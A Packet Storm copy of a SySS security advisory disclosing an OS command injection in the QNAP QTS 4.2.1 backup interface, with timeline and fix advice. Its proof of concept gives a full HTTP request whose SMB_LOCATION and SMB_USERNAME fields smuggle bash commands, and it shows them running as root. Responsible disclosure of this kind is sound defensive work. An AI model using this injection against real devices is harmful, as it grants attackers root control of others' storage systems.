what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

QNAP QTS 4.2.1 Build 20160601 Command Injection

QNAP QTS 4.2.1 Build 20160601 Command Injection
Posted Aug 19, 2016
Authored by Sebastian Nerz | Site syss.de

QNAP QTS version 4.2.1 Build 20160601 suffers from an OS command injection vulnerability.

tags | exploit
SHA-256 | cb5c2ee3db6c55c22f86862e5b72bd113f7ae769e329bc847caa576516a573f1

QNAP QTS 4.2.1 Build 20160601 Command Injection

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-055
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: Unfixed
Manufacturer Notification: 2016-06-08
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH found an OS command injection in the appRequest plugin of
the current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Log in to the QNAP. The user needs the privileges to create backup
jobs.

2. Run a request like the following, testing connection to another QNAP
for backups:

==
POST /cgi-bin/wizReq.cgi? HTTP/1.1
Host: [IP of the QNAP]:8080
Content-Length: 282

wiz_func=backup&action=test_server&count=1465380979663&RR_CLIENT_MODE=QNAP_mode&SMB_LOCATION=$(bash%20-c%20"(echo;pwd)1>%262";exit)&RR_CLIENT_PORT=873&REMOTE_VOL=undefined&REMOTE_PATH=%2F&SMB_USERNAME=$(bash%20-c%20"(echo;id)1>%262";exit)&SMB_PASSWD=asd&No_vol_info=yes&sid=[sid]

3. The contained commands in SMB_LOCATION and SMB_USERNAME will be
executed, as demonstrated in the following server response containing
the output of the id and pwd commands:

==
HTTP/1.1 200 OK
Date: Wed, 08 Jun 2016 10:31:50 GMT
Content-Type: text/plain
Content-Length: 1205

uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)

/home/httpd/cgi-bin
Content-type: text/xml

<?xml version="1.0" encoding="UTF-8" ?>
<QDocRoot version="1.0">
[...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer has not released any security update or patch so far.
Validate input-strings, escape shell arguments or use parametrized
command executions.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-06-08: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-055
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-055.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Nerz of the SySS
GmbH.

E-Mail: sebastian.nerz@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVpAAoJENEtJqSRgP2ywaYH/iCazUSz3EwUPxCTYQ2Qp8ce
egdvqcBUGXnqsUaUWy181K8R1Ive0h2F8IzTCft5gPX8y9FT+Pa35e1po/fBIFJg
EmV0w8D79+BAvUK23POFFyRXubrvtBQ9hOgq45qPYvGUkHEMGdzDRB9fuACwoJwS
xVxxWjtz7EgPPhhGzuh9RKu4slgJzsFustUNci/6FDPDc1+samcPxp3a/xo9ol2h
WEuaN80USZEdQgmTpf/2ePpVWmv72mtNrtWXLNbuUEtnYxALmO15S9BGQ7RpN+cB
hzM9CB87c7AIqd6owslaGcP4ZmjyKRSp1zgZnVycZPxsuVWrKmGetnewf1eOE0g=
=0eHe
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close